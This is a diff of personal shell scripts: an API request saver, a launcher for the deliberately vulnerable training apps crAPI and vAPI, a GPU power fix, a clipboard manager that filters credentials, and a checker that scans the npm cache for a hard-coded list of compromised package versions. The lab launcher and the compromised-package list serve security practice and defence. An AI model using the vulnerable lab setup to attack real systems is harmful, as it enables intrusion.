            echo -e "${BOLD}${CYAN}JSON Response:${NC}"
            head -n -3 "$response_file" | jq .
        fi
    fi
}
|
||||||
|
|
||||||
|
# List saved requests
|
||||||
|
# Print a one-line summary (name, HTTP method, URL) for every saved request.
# Method/URL are best-effort scraped from the saved script; "?" if absent.
list_requests() {
    local entries
    entries=$(ls -A "$REQUESTS_DIR" 2>/dev/null || true)
    if [[ -z "$entries" ]]; then
        echo -e "${YELLOW}No saved requests${NC}"
        exit 0
    fi

    echo -e "${BOLD}${CYAN}Saved Requests:${NC}"
    echo

    local req_file req_name method url
    for req_file in "$REQUESTS_DIR"/*.sh; do
        req_name=$(basename "$req_file" .sh)
        method=$(grep -oP 'POST|GET|PUT|DELETE|PATCH' "$req_file" | head -1 || echo "?")
        url=$(grep -oP 'https?://[^\s"]+' "$req_file" | head -1 || echo "?")
        printf "  %-20s ${CYAN}%-7s${NC} %s\n" "$req_name" "$method" "$url"
    done
}
|
||||||
|
|
||||||
|
# Show request details
|
||||||
|
# Dump a saved request script to the terminal (bat for highlighting when
# available, plain cat otherwise). Exits 1 if the name is unknown.
show_request() {
    local name=$1
    local request_file="$REQUESTS_DIR/$name.sh"

    if [[ ! -f "$request_file" ]]; then
        echo -e "${RED}Error:${NC} Request not found: $name" >&2
        exit 1
    fi

    echo -e "${BOLD}${CYAN}Request: $name${NC}"
    echo

    local pager=cat
    command -v bat &>/dev/null && pager=bat
    "$pager" "$request_file"
}
|
||||||
|
|
||||||
|
# Delete request
|
||||||
|
# Delete a saved request after an interactive y/N confirmation (reads one
# line from stdin; anything but a single y/Y cancels).
delete_request() {
    local name=$1
    local request_file="$REQUESTS_DIR/$name.sh"

    if [[ ! -f "$request_file" ]]; then
        echo -e "${RED}Error:${NC} Request not found: $name" >&2
        exit 1
    fi

    local answer
    echo -n "Delete request '$name'? (y/N) "
    read -r answer
    case "$answer" in
        [Yy])
            rm "$request_file"
            echo -e "${GREEN}✓${NC} Deleted: $name"
            ;;
        *)
            echo "Cancelled"
            ;;
    esac
}
|
||||||
|
|
||||||
|
# Show response history
|
||||||
|
# List saved responses for a request, newest first, with HTTP status and
# timing parsed from the 3-line trailer appended by the saved curl command.
# Status color: green 2xx, yellow 4xx, red 5xx, plain otherwise.
show_history() {
    local name=$1

    local responses
    responses=$(find "$RESPONSES_DIR" -name "${name}_*.txt" 2>/dev/null | sort -r)

    if [[ -z "$responses" ]]; then
        echo -e "${YELLOW}No response history for: $name${NC}"
        exit 0
    fi

    echo -e "${BOLD}${CYAN}Response History: $name${NC}"
    echo

    local file stamp status elapsed colored
    while read -r file; do
        stamp=$(basename "$file" | sed "s/${name}_//" | sed 's/.txt//')
        status=$(tail -3 "$file" | grep "Status:" | awk '{print $2}')
        elapsed=$(tail -3 "$file" | grep "Time:" | awk '{print $2}')

        case "$status" in
            2*) colored="${GREEN}$status${NC}" ;;
            4*) colored="${YELLOW}$status${NC}" ;;
            5*) colored="${RED}$status${NC}" ;;
            *)  colored="$status" ;;
        esac

        echo -e "  $stamp - Status: $colored - Time: $elapsed"
    done <<< "$responses"

    echo
    echo -e "${CYAN}Tip:${NC} Use 'api diff $name' to compare last two responses"
}
|
||||||
|
|
||||||
|
# Diff last two responses
|
||||||
|
# Unified diff of the two most recent responses for a request, with the
# 3-line Status/Time trailer stripped from each side first.
diff_responses() {
    local name=$1

    local -a latest
    mapfile -t latest < <(find "$RESPONSES_DIR" -name "${name}_*.txt" 2>/dev/null | sort -r | head -2)

    if (( ${#latest[@]} < 2 )); then
        echo -e "${YELLOW}Need at least 2 responses to diff${NC}"
        exit 0
    fi

    echo -e "${BOLD}${CYAN}Diff: $name${NC}"
    echo -e "${CYAN}Latest:${NC} $(basename "${latest[0]}")"
    echo -e "${CYAN}Previous:${NC} $(basename "${latest[1]}")"
    echo

    # diff exits non-zero when files differ; that is the normal case here.
    diff -u <(head -n -3 "${latest[1]}") <(head -n -3 "${latest[0]}") || true
}
|
||||||
|
|
||||||
|
# Token management
|
||||||
|
# Manage the persistent token store ($TOKENS_FILE, one JSON object).
#   set KEY VALUE  — upsert a token
#   get KEY        — print the value (exit 1 if absent)
#   list           — print stored key names
# All subcommands require jq.
#
# Fix: `get` previously interpolated the key into the jq filter text
# (`jq -r ".$key"`), which broke for keys containing '.', quotes, etc. and
# allowed jq filter injection. The key is now passed as a jq variable.
manage_token() {
    local action=$1
    shift

    case "$action" in
        set)
            if [[ $# -lt 2 ]]; then
                echo -e "${RED}Error:${NC} Usage: api token set KEY VALUE" >&2
                exit 1
            fi
            key=$1
            value=$2

            # Update the JSON object via a temp file, then rename into place.
            if command -v jq &>/dev/null; then
                jq --arg k "$key" --arg v "$value" '. + {($k): $v}' "$TOKENS_FILE" > "$TOKENS_FILE.tmp"
                mv "$TOKENS_FILE.tmp" "$TOKENS_FILE"
                echo -e "${GREEN}✓${NC} Token saved: $key"
            else
                echo -e "${RED}Error:${NC} jq required for token management" >&2
                exit 1
            fi
            ;;

        get)
            if [[ $# -lt 1 ]]; then
                echo -e "${RED}Error:${NC} Usage: api token get KEY" >&2
                exit 1
            fi
            key=$1

            if command -v jq &>/dev/null; then
                # --arg binding handles arbitrary key strings safely.
                value=$(jq -r --arg k "$key" '.[$k] // empty' "$TOKENS_FILE")
                if [[ -n "$value" ]]; then
                    echo "$value"
                else
                    echo -e "${YELLOW}Token not found: $key${NC}" >&2
                    exit 1
                fi
            fi
            ;;

        list)
            if command -v jq &>/dev/null; then
                echo -e "${BOLD}${CYAN}Saved Tokens:${NC}"
                jq -r 'keys[]' "$TOKENS_FILE"
            fi
            ;;

        *)
            echo -e "${RED}Error:${NC} Unknown token action: $action" >&2
            echo "Use: set, get, list" >&2
            exit 1
            ;;
    esac
}
|
||||||
|
|
||||||
|
# Export request
|
||||||
|
# Print a saved request in the given export format. Only "curl" is
# supported: the curl invocation onward, with comment lines removed.
export_request() {
    local name=$1
    local format=${2:-curl}
    local request_file="$REQUESTS_DIR/$name.sh"

    if [[ ! -f "$request_file" ]]; then
        echo -e "${RED}Error:${NC} Request not found: $name" >&2
        exit 1
    fi

    if [[ "$format" != "curl" ]]; then
        echo -e "${RED}Error:${NC} Unknown format: $format" >&2
        echo "Supported: curl" >&2
        exit 1
    fi

    # Everything from the first line mentioning curl, minus comments.
    grep -A 999 'curl' "$request_file" | grep -v '^#'
}
|
||||||
|
|
||||||
|
# Initialize
|
||||||
|
# ---------------------------------------------------------------------------
# Entry point: ensure the state directories exist, then dispatch on the
# subcommand. Each subcommand validates its arity before delegating.
# ---------------------------------------------------------------------------
init_api

if [[ $# -eq 0 ]]; then
    show_help
    exit 0
fi

# usage_die MIN GIVEN TEXT — exit with a usage error unless GIVEN >= MIN.
usage_die() {
    if (( $2 < $1 )); then
        echo -e "${RED}Error:${NC} Usage: $3" >&2
        exit 1
    fi
}

case $1 in
    -h|--help|help)
        show_help
        ;;
    save)
        usage_die 3 $# "api save NAME CURL_ARGS"
        shift
        save_request "$@"
        ;;
    run)
        usage_die 2 $# "api run NAME [VARS]"
        shift
        run_request "$@"
        ;;
    list|ls)
        list_requests
        ;;
    show)
        usage_die 2 $# "api show NAME"
        show_request "$2"
        ;;
    delete|rm)
        usage_die 2 $# "api delete NAME"
        delete_request "$2"
        ;;
    history)
        usage_die 2 $# "api history NAME"
        show_history "$2"
        ;;
    diff)
        usage_die 2 $# "api diff NAME"
        diff_responses "$2"
        ;;
    token)
        usage_die 2 $# "api token <set|get|list> ..."
        shift
        manage_token "$@"
        ;;
    export)
        usage_die 2 $# "api export NAME [FORMAT]"
        export_request "$2" "${3:-curl}"
        ;;
    *)
        echo -e "${RED}Error:${NC} Unknown command: $1" >&2
        echo "Run 'api --help' for usage" >&2
        exit 1
        ;;
esac
|
||||||
241
scripts/api-lab
Executable file
241
scripts/api-lab
Executable file
|
|
@ -0,0 +1,241 @@
|
||||||
|
#!/usr/bin/env bash
set -euo pipefail

# Script Name: api-lab
# Description: Quick launcher for API testing vulnerable apps (crAPI and vAPI)
# Usage: api-lab start|stop|status|logs

VERSION="1.0.0"

# Colors (ANSI escapes, rendered via `echo -e`)
readonly RED='\033[0;31m'
readonly GREEN='\033[0;32m'
readonly YELLOW='\033[1;33m'
readonly BLUE='\033[0;34m'
readonly CYAN='\033[0;36m'
readonly BOLD='\033[1m'
readonly NC='\033[0m'

# Lab layout: everything lives under ~/api-lab, one subdirectory per app.
LAB_DIR="$HOME/api-lab"
CRAPI_DIR="$LAB_DIR/crapi"
VAPI_DIR="$LAB_DIR/vapi"
|
||||||
|
|
||||||
|
# Print usage/help text: commands, app names, examples, and local URLs.
show_help() {
    echo -e "${BOLD}api-lab${NC} - API Testing Lab Manager v${VERSION}"
    echo
    echo -e "${BOLD}USAGE:${NC}"
    echo "  api-lab <command> [app]"
    echo
    echo -e "${BOLD}COMMANDS:${NC}"
    echo -e "  ${CYAN}start [app]${NC}   Start lab containers (crapi, vapi, or both)"
    echo -e "  ${CYAN}stop [app]${NC}    Stop lab containers"
    echo -e "  ${CYAN}status${NC}        Show running containers"
    echo -e "  ${CYAN}logs [app]${NC}    Show container logs"
    echo -e "  ${CYAN}setup${NC}         Initial lab setup (clone repos)"
    echo
    echo -e "${BOLD}APPS:${NC}"
    echo -e "  ${YELLOW}crapi${NC} - Completely Ridiculous API (OWASP)"
    echo -e "  ${YELLOW}vapi${NC}  - Vulnerable API"
    echo -e "  ${YELLOW}both${NC}  - Start/stop both apps (default)"
    echo
    echo -e "${BOLD}EXAMPLES:${NC}"
    echo "  api-lab start          # Start both labs"
    echo "  api-lab start crapi    # Start only crAPI"
    echo "  api-lab stop           # Stop both labs"
    echo "  api-lab status         # Check what's running"
    echo "  api-lab logs vapi      # View vAPI logs"
    echo
    echo -e "${BOLD}URLS:${NC}"
    echo "  crAPI:   http://127.0.0.1:8888"
    echo "  Mailhog: http://127.0.0.1:8025"
    echo "  vAPI:    http://127.0.0.1/vapi"
}
|
||||||
|
|
||||||
|
# Check if docker is available
|
||||||
|
# Abort with install instructions when the docker CLI is not on PATH.
check_docker() {
    command -v docker &>/dev/null && return
    echo -e "${RED}Error:${NC} Docker not installed"
    echo "Install: sudo apt install docker.io docker-compose"
    exit 1
}
|
||||||
|
|
||||||
|
# Setup lab directories
|
||||||
|
# One-time lab bootstrap: fetch crAPI's upstream docker-compose file and
# git-clone vAPI, pre-pulling images for both. Idempotent — any app whose
# directory already exists is skipped. Requires network access and sudo.
setup_lab() {
    echo -e "${CYAN}[*]${NC} Setting up API testing lab..."

    mkdir -p "$LAB_DIR"

    # crAPI: only the compose file is needed, no repo clone.
    if [[ -d "$CRAPI_DIR" ]]; then
        echo -e "${GREEN}✓${NC} crAPI already exists"
    else
        echo -e "${YELLOW}[*]${NC} Setting up crAPI..."
        mkdir -p "$CRAPI_DIR"
        cd "$CRAPI_DIR"
        curl -o docker-compose.yml https://raw.githubusercontent.com/OWASP/crAPI/main/deploy/docker/docker-compose.yml
        sudo docker-compose pull
        echo -e "${GREEN}✓${NC} crAPI setup complete"
    fi

    # vAPI: full repository clone.
    if [[ -d "$VAPI_DIR" ]]; then
        echo -e "${GREEN}✓${NC} vAPI already exists"
    else
        echo -e "${YELLOW}[*]${NC} Setting up vAPI..."
        cd "$LAB_DIR"
        git clone https://github.com/roottusk/vapi.git
        cd "$VAPI_DIR"
        sudo docker-compose pull
        echo -e "${GREEN}✓${NC} vAPI setup complete"
    fi

    echo
    echo -e "${GREEN}✓${NC} Lab setup complete!"
    echo -e "${CYAN}[*]${NC} Run: ${BOLD}api-lab start${NC} to launch"
}
|
||||||
|
|
||||||
|
# Start containers
|
||||||
|
# Bring up one lab via docker-compose, or both. Valid targets:
# crapi, vapi, both/all (default: both). Exits 1 for unknown targets or
# when the app has not been set up yet.
start_lab() {
    local target="${1:-both}"

    case "$target" in
        crapi)
            if [[ ! -d "$CRAPI_DIR" ]]; then
                echo -e "${RED}Error:${NC} crAPI not set up. Run: api-lab setup"
                exit 1
            fi
            echo -e "${CYAN}[*]${NC} Starting crAPI..."
            cd "$CRAPI_DIR"
            sudo docker-compose -f docker-compose.yml --compatibility up -d
            echo -e "${GREEN}✓${NC} crAPI started"
            echo -e "${CYAN}[*]${NC} Access at: ${BOLD}http://127.0.0.1:8888${NC}"
            echo -e "${CYAN}[*]${NC} Mailhog at: ${BOLD}http://127.0.0.1:8025${NC}"
            ;;

        vapi)
            if [[ ! -d "$VAPI_DIR" ]]; then
                echo -e "${RED}Error:${NC} vAPI not set up. Run: api-lab setup"
                exit 1
            fi
            echo -e "${CYAN}[*]${NC} Starting vAPI..."
            cd "$VAPI_DIR"
            sudo docker-compose up -d
            echo -e "${GREEN}✓${NC} vAPI started"
            echo -e "${CYAN}[*]${NC} Access at: ${BOLD}http://127.0.0.1/vapi${NC}"
            ;;

        both|all)
            # Recurse once per app.
            start_lab crapi
            echo
            start_lab vapi
            ;;

        *)
            echo -e "${RED}Error:${NC} Unknown app: $target"
            echo "Valid options: crapi, vapi, both"
            exit 1
            ;;
    esac
}
|
||||||
|
|
||||||
|
# Stop containers
|
||||||
|
# Stop one lab's containers, or both. Targets whose directory does not
# exist are silently skipped (nothing was ever set up there).
stop_lab() {
    local target="${1:-both}"

    case "$target" in
        crapi)
            if [[ -d "$CRAPI_DIR" ]]; then
                echo -e "${CYAN}[*]${NC} Stopping crAPI..."
                cd "$CRAPI_DIR"
                sudo docker-compose stop
                echo -e "${GREEN}✓${NC} crAPI stopped"
            fi
            ;;

        vapi)
            if [[ -d "$VAPI_DIR" ]]; then
                echo -e "${CYAN}[*]${NC} Stopping vAPI..."
                cd "$VAPI_DIR"
                sudo docker-compose stop
                echo -e "${GREEN}✓${NC} vAPI stopped"
            fi
            ;;

        both|all)
            stop_lab crapi
            stop_lab vapi
            ;;

        *)
            echo -e "${RED}Error:${NC} Unknown app: $target"
            exit 1
            ;;
    esac
}
|
||||||
|
|
||||||
|
# Show status
|
||||||
|
# List running lab containers: `docker ps` filtered to the table header and
# any container whose name mentions crapi/vapi. Requires sudo.
show_status() {
    echo -e "${BOLD}${CYAN}API Lab Status:${NC}"
    echo
    sudo docker ps --format "table {{.Names}}\t{{.Status}}\t{{.Ports}}" | grep -E "(NAMES|crapi|vapi)" || echo "No lab containers running"
}
|
||||||
|
|
||||||
|
# Show logs
|
||||||
|
# Follow docker-compose logs for one app. The app argument is mandatory
# (there is no sensible default for a log tail).
show_logs() {
    local target="${1:-}"

    if [[ -z "$target" ]]; then
        echo -e "${RED}Error:${NC} Specify app: crapi or vapi"
        exit 1
    fi

    case "$target" in
        crapi)
            cd "$CRAPI_DIR"
            sudo docker-compose logs -f
            ;;
        vapi)
            cd "$VAPI_DIR"
            sudo docker-compose logs -f
            ;;
        *)
            echo -e "${RED}Error:${NC} Unknown app: $target"
            exit 1
            ;;
    esac
}
|
||||||
|
|
||||||
|
# Main
|
||||||
|
# --- entry point -----------------------------------------------------------
# Require docker, then dispatch on the first argument; remaining arguments
# are passed through to the subcommand handler.
check_docker

if [[ $# -eq 0 ]] || [[ "$1" =~ ^(-h|--help|help)$ ]]; then
    show_help
    exit 0
fi

cmd="$1"
shift

case "$cmd" in
    setup|install)
        setup_lab
        ;;
    start|up)
        start_lab "${1:-both}"
        ;;
    stop|down)
        stop_lab "${1:-both}"
        ;;
    status|ps)
        show_status
        ;;
    logs)
        show_logs "${1:-}"
        ;;
    *)
        echo -e "${RED}Error:${NC} Unknown command: $cmd"
        echo "Run 'api-lab --help' for usage"
        exit 1
        ;;
esac
|
||||||
22
scripts/apply-gpu-fix.sh
Executable file
22
scripts/apply-gpu-fix.sh
Executable file
|
|
@ -0,0 +1,22 @@
|
||||||
|
#!/bin/bash
# Apply AMD GPU power management fix for Pop!_OS 22.04
#
# Writes /etc/modprobe.d/amdgpu.conf to disable amdgpu dynamic power
# management, rebuilds the initramfs, and asks the user to reboot.
# Requires sudo for the two privileged steps.

echo "Creating AMD GPU configuration..."
# The heredoc delimiter sits inside single quotes, so the content is written
# literally (no expansion) by the root shell.
sudo bash -c 'cat > /etc/modprobe.d/amdgpu.conf << EOFINNER
# Disable aggressive power management for AMD Phoenix GPU
# Temporary fix until Pop!_OS 24.04 stable (Dec 11, 2025)
options amdgpu ppfeaturemask=0x0
options amdgpu dpm=0
EOFINNER'

echo ""
echo "Verifying configuration was created..."
cat /etc/modprobe.d/amdgpu.conf

echo ""
echo "Rebuilding initramfs..."
# -u regenerates the initramfs for the current kernel so the new module
# options take effect at the next boot.
sudo update-initramfs -u

echo ""
echo "✅ Fix applied! Please reboot now:"
echo "  sudo reboot"
|
||||||
37
scripts/catbin
Executable file
37
scripts/catbin
Executable file
|
|
@ -0,0 +1,37 @@
|
||||||
|
#!/usr/bin/env bash
set -euo pipefail

# Script Name: catbin
# Description: Display source code of executables in PATH (security auditing!)
# Source: https://evanhahn.com/scripts-i-wrote-that-i-use-all-the-time/
# Credit: Evan Hahn - https://codeberg.org/EvanHahn/dotfiles
# Usage: catbin httpstatus   # see what the httpstatus script does
#        catbin tryna        # audit the tryna script
#        catbin ls           # won't work for binaries, only scripts

if (( $# == 0 )); then
    echo "Usage: catbin <command-name>" >&2
    echo "Example: catbin httpstatus" >&2
    exit 1
fi

target=$(command -v "$1" 2>/dev/null || true)

if [[ -z "$target" ]]; then
    echo "Command not found: $1" >&2
    exit 1
fi

# Refuse to dump binaries to the terminal; only text files (scripts) pass.
if ! file "$target" | grep -q "text"; then
    echo "Error: $target is a binary, not a script" >&2
    echo "File type: $(file "$target")" >&2
    exit 1
fi

# Prefer bat for syntax highlighting when it is installed.
if command -v bat &>/dev/null; then
    bat "$target"
else
    cat "$target"
fi
|
||||||
56
scripts/check-npm-cache.sh
Executable file
56
scripts/check-npm-cache.sh
Executable file
|
|
@ -0,0 +1,56 @@
|
||||||
|
#!/usr/bin/env bash
set -euo pipefail

# Check whether a list of (potentially compromised) npm package versions is
# present in the local npm cache. Requires jq; npm is invoked best-effort.
#
# Fix: the cache match previously used `grep -q "${name}-${version}"`, where
# the dots in versions are regex wildcards (e.g. "1.3.3" also matches
# "1x3y3") and a leading "-" in data could be taken as a grep option. The
# match is now fixed-string (-F) with "--" terminating option parsing.

packages_json='[
  {"name":"backslash","version":"0.2.1"},
  {"name":"chalk-template","version":"1.1.1"},
  {"name":"supports-hyperlinks","version":"4.1.1"},
  {"name":"has-ansi","version":"6.0.1"},
  {"name":"simple-swizzle","version":"0.2.3"},
  {"name":"color-string","version":"2.1.1"},
  {"name":"error-ex","version":"1.3.3"},
  {"name":"color-name","version":"2.0.1"},
  {"name":"is-arrayish","version":"0.3.3"},
  {"name":"slice-ansi","version":"7.1.1"},
  {"name":"color-convert","version":"3.1.1"},
  {"name":"wrap-ansi","version":"9.0.1"},
  {"name":"ansi-regex","version":"6.2.1"},
  {"name":"supports-color","version":"10.2.1"},
  {"name":"strip-ansi","version":"7.1.1"},
  {"name":"chalk","version":"5.6.1"},
  {"name":"debug","version":"4.4.2"},
  {"name":"ansi-styles","version":"6.2.2"},
  {"name":"proto-tinker-wc","version":"0.1.87"},
  {"name":"duckdb","version":"1.3.3"},
  {"name":"@duckdb/node-api","version":"1.3.3"},
  {"name":"@duckdb/node-bindings","version":"1.3.3"}
]'

if ! command -v jq >/dev/null 2>&1; then
  echo "Error: 'jq' is required (to parse the JSON array-of-objects)."
  exit 1
fi

names=$(printf '%s\n' "$packages_json" | jq -r '.[].name' | tr '\n' ' ')

echo "Running 'npm cache ls' for given packages..."
# $names is intentionally unquoted: one word per package name.
npm_output="$(npm cache ls $names 2>/dev/null || true)"

echo
echo "Packages found in npm cache:"
tmpfile=$(mktemp)
trap 'rm -f "$tmpfile"' EXIT

# The while loop runs in a pipeline subshell, so hits are recorded through a
# temp file instead of a shell variable.
printf '%s\n' "$packages_json" | jq -r '.[] | "\(.name)\t\(.version)"' | \
while IFS=$'\t' read -r name version; do
  if [ -n "$name" ] && printf '%s\n' "$npm_output" | grep -qF -- "${name}-${version}"; then
    echo "• $name@$version"
    echo 1 >> "$tmpfile"
  fi
done

if ! grep -q 1 "$tmpfile"; then
  echo "(none)"
fi
|
||||||
|
|
||||||
18
scripts/cht.sh
Executable file
18
scripts/cht.sh
Executable file
|
|
@ -0,0 +1,18 @@
|
||||||
|
#!/bin/bash

# Primagean cht.sh
# tmux + cht.sh + fzf
#
# Pick a language or core utility with fzf, prompt for a query, then open a
# tmux window running curl against cht.sh. Languages use the
# /<topic>/<query> URL shape; core utilities use /<topic>~<query>.
#
# Fixes: $() instead of backticks, quoted expansions, read -r, exact-line
# matching for the language check (the old unquoted `printf $languages |
# grep -qs $selected` did a substring match against the concatenated list),
# and a clean exit when fzf is cancelled (previously an empty selection
# still fired a curl to "cht.sh//...").

languages="golang
lua
cpp
c
typescript
nodejs"
core_utils="xargs
find
mv
sed
awk"

selected=$(printf '%s\n%s\n' "$languages" "$core_utils" | fzf) || exit 1
read -rp "query: " query

if grep -qx -- "$selected" <<< "$languages"; then
    # Language lookups join query words with '+'.
    tmux neww bash -c "curl cht.sh/$selected/$(printf '%s' "$query" | tr ' ' '+') & while [ : ]; do sleep 1; done"
else
    tmux neww bash -c "curl cht.sh/$selected~$query & while [ : ]; do sleep 1; done"
fi
|
||||||
|
|
||||||
|
|
||||||
528
scripts/clip
Executable file
528
scripts/clip
Executable file
|
|
@ -0,0 +1,528 @@
|
||||||
|
#!/usr/bin/env bash
set -euo pipefail

# Script Name: clip
# Description: Smart clipboard manager with history, search, and categories
# Usage: clip              # Show history with fzf search
#        clip pin          # Pin current clipboard item
#        clip cat 5        # Show 5th history item
#        clip search "192" # Search history
#        clip clear        # Clear history

VERSION="1.0.0"
# On-disk layout: newline-delimited "timestamp|type|content" records.
CLIP_DIR="$HOME/.clipboard"
HISTORY_FILE="$CLIP_DIR/history.txt"
PINS_FILE="$CLIP_DIR/pins.txt"
# History is trimmed to this many newest entries.
MAX_HISTORY=100

# Colors (ANSI escapes, rendered via `echo -e`)
readonly GREEN='\033[0;32m'
readonly YELLOW='\033[1;33m'
readonly BLUE='\033[0;34m'
readonly RED='\033[0;31m'
readonly CYAN='\033[0;36m'
readonly MAGENTA='\033[0;35m'
readonly BOLD='\033[1m'
readonly NC='\033[0m'
|
||||||
|
|
||||||
|
# Initialize clip directory
|
||||||
|
# Create the storage directory and empty history/pins files on first use.
init_clip() {
    [[ -d "$CLIP_DIR" ]] && return
    mkdir -p "$CLIP_DIR"
    touch "$HISTORY_FILE" "$PINS_FILE"
}
|
||||||
|
|
||||||
|
# Print the full usage/help text: commands, examples, feature list, and
# storage locations.
show_help() {
    echo -e "${BOLD}clip${NC} - Smart Clipboard Manager v${VERSION}"
    echo
    echo -e "${BOLD}USAGE:${NC}"
    echo "  clip [COMMAND]"
    echo
    echo -e "${BOLD}COMMANDS:${NC}"
    echo -e "  ${CYAN}(no args)${NC}      Show history with fzf search"
    echo -e "  ${CYAN}pin${NC}            Pin current clipboard item"
    echo -e "  ${CYAN}pins${NC}           Show pinned items"
    echo -e "  ${CYAN}cat N${NC}          Show Nth history item"
    echo -e "  ${CYAN}search TERM${NC}    Search history"
    echo -e "  ${CYAN}list${NC}           List recent history (last 20)"
    echo -e "  ${CYAN}save${NC}           Save current clipboard to history"
    echo -e "  ${CYAN}clear${NC}          Clear history"
    echo -e "  ${CYAN}delete N${NC}       Delete Nth history item"
    echo -e "  ${CYAN}unpin N${NC}        Delete Nth pinned item"
    echo -e "  ${CYAN}stats${NC}          Show statistics"
    echo -e "  ${CYAN}-h, --help${NC}     Show this help"
    echo
    echo -e "${BOLD}EXAMPLES:${NC}"
    echo "  clip                    # Interactive search"
    echo "  clip pin                # Pin important item"
    echo "  clip search \"192.168\"   # Find IP addresses"
    echo "  clip cat 1              # Show most recent"
    echo "  clip delete 5           # Delete 5th item from history"
    echo "  clip unpin 1            # Delete 1st pinned item"
    echo
    echo -e "${BOLD}FEATURES:${NC}"
    echo "  - Automatic history (monitors clipboard)"
    echo "  - Pattern detection (URLs, IPs, hashes)"
    echo "  - Security: Auto-expire sensitive data"
    echo "  - Pin important items"
    echo "  - fzf integration for search"
    echo
    echo -e "${BOLD}NOTES:${NC}"
    echo "  History: $HISTORY_FILE"
    echo "  Pins: $PINS_FILE"
    echo "  Max history: $MAX_HISTORY items"
}
|
||||||
|
|
||||||
|
# Detect content type
|
||||||
|
# Classify clipboard content so callers can label entries and refuse to
# persist secrets. Prints one of: credential|url|ip|hash|code|text.
#
# Fix: the credential pattern is now checked FIRST. Previously it was last,
# so content that also matched an earlier branch — e.g. "const password =
# ..." (code) or a URL with "token=..." in it — was classified as code/url
# and written to plaintext history, bypassing the security filter in
# save_to_history.
detect_type() {
    local content="$1"

    # Anything that looks like a secret wins over the other classifiers.
    if [[ "$content" =~ (password|secret|token|key|bearer|api[_-]?key) ]]; then
        echo "credential"
    # URL
    elif [[ "$content" =~ ^https?:// ]]; then
        echo "url"
    # IPv4 (dotted-quad prefix)
    elif [[ "$content" =~ ^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3} ]]; then
        echo "ip"
    # MD5 / SHA-1 / SHA-256 hex digest
    elif [[ "$content" =~ ^[a-f0-9]{32}$ ]] || [[ "$content" =~ ^[a-f0-9]{40}$ ]] || [[ "$content" =~ ^[a-f0-9]{64}$ ]]; then
        echo "hash"
    # Source-code keyword markers
    elif [[ "$content" =~ (function|const|var|class|def|import|export) ]]; then
        echo "code"
    else
        echo "text"
    fi
}
|
||||||
|
|
||||||
|
# Save item to history
|
||||||
|
# Append one clipboard entry ("timestamp|type|content") to the history file.
# Credentials (per detect_type), empty strings, and consecutive duplicates
# are skipped; the file is trimmed to the newest $MAX_HISTORY lines.
save_to_history() {
    local content="$1"
    local kind
    kind=$(detect_type "$content")

    # Refuse to persist anything that looks like a secret.
    if [[ "$kind" == "credential" ]]; then
        echo -e "${YELLOW}⚠${NC} Sensitive data detected - not saved to history" >&2
        return 0
    fi

    if [[ -z "$content" ]]; then
        return 0
    fi

    # Consecutive-duplicate filter: skip when identical to the newest entry.
    if [[ -f "$HISTORY_FILE" ]]; then
        local newest
        newest=$(tail -1 "$HISTORY_FILE" | cut -d'|' -f3-)
        if [[ "$newest" == "$content" ]]; then
            return 0
        fi
    fi

    printf '%s|%s|%s\n' "$(date '+%Y-%m-%d %H:%M:%S')" "$kind" "$content" >> "$HISTORY_FILE"

    # Keep only the newest MAX_HISTORY entries.
    if [[ $(wc -l < "$HISTORY_FILE") -gt $MAX_HISTORY ]]; then
        tail -n $MAX_HISTORY "$HISTORY_FILE" > "$HISTORY_FILE.tmp"
        mv "$HISTORY_FILE.tmp" "$HISTORY_FILE"
    fi
}
|
||||||
|
|
||||||
|
# Get current clipboard
|
||||||
|
# Print the current clipboard contents (xsel preferred, xclip fallback).
get_clipboard() {
    if command -v xsel &>/dev/null; then
        xsel --output --clipboard
        return
    fi
    if command -v xclip &>/dev/null; then
        xclip -selection clipboard -o
        return
    fi
    echo "Error: No clipboard tool found" >&2
    return 1
}
|
||||||
|
|
||||||
|
# Set clipboard
|
||||||
|
# Replace the clipboard contents with $1 (xsel preferred, xclip fallback).
#
# Fix: content is fed to the tool via printf rather than `echo -n "$1"`,
# so strings beginning with "-n"/"-e" are no longer swallowed as echo
# options (and no trailing newline is added, matching the old intent).
set_clipboard() {
    if command -v xsel &>/dev/null; then
        printf '%s' "$1" | xsel --input --clipboard
    elif command -v xclip &>/dev/null; then
        printf '%s' "$1" | xclip -selection clipboard
    else
        echo "Error: No clipboard tool found" >&2
        return 1
    fi
}
|
||||||
|
|
||||||
|
# Interactive history browser with fzf
|
||||||
|
# Interactive fuzzy search over the history; the chosen entry is copied
# back to the clipboard via set_clipboard. Requires fzf. Entries are shown
# newest-first as "idx | time | [type] | preview" with the preview truncated
# to 60 characters; the index maps back to the full record on selection.
show_history_fzf() {
    if ! command -v fzf &>/dev/null; then
        echo -e "${RED}Error:${NC} fzf not found" >&2
        echo "Install it with: sudo apt install fzf" >&2
        exit 1
    fi

    if [[ ! -f "$HISTORY_FILE" ]] || [[ ! -s "$HISTORY_FILE" ]]; then
        echo -e "${YELLOW}No history yet${NC}" >&2
        exit 0
    fi

    local choice
    choice=$(tac "$HISTORY_FILE" | awk -F'|' '
        {
            idx = NR
            time = $1
            type = $2
            content = $3
            # Re-join any "|" characters that were part of the content.
            for (i=4; i<=NF; i++) content = content "|" $i

            # Truncate preview
            preview = content
            if (length(preview) > 60) {
                preview = substr(preview, 1, 60) "..."
            }

            printf "%3d | %s | %-10s | %s\n", idx, time, "[" type "]", preview
        }
    ' | fzf --height=60% --layout=reverse \
        --header="Select item to copy (ESC to cancel)" \
        --preview='echo {}' \
        --preview-window=up:3:wrap)

    if [[ -n "$choice" ]]; then
        # Map the displayed index back to the full (untruncated) entry.
        local row full
        row=$(echo "$choice" | awk '{print $1}')
        full=$(tac "$HISTORY_FILE" | sed -n "${row}p" | cut -d'|' -f3-)

        set_clipboard "$full"
        echo -e "${GREEN}✓${NC} Copied to clipboard"
    fi
}
|
||||||
|
|
||||||
|
# Pin current clipboard
|
||||||
|
# Pin the current clipboard contents: append one "timestamp|type|content"
# line to the pins file. Exits with an error if the clipboard is empty.
pin_item() {
    local content=$(get_clipboard)

    [[ -n "$content" ]] || {
        echo -e "${RED}Error:${NC} Clipboard is empty" >&2
        exit 1
    }

    type=$(detect_type "$content")
    timestamp=$(date '+%Y-%m-%d %H:%M:%S')

    echo "$timestamp|$type|$content" >> "$PINS_FILE"
    echo -e "${GREEN}✓${NC} Pinned item (type: $type)"
}
|
||||||
|
|
||||||
|
# Show pins
|
||||||
|
# List pinned items. With fzf available, offers interactive selection and
# copies the chosen pin to the clipboard; otherwise just prints the list.
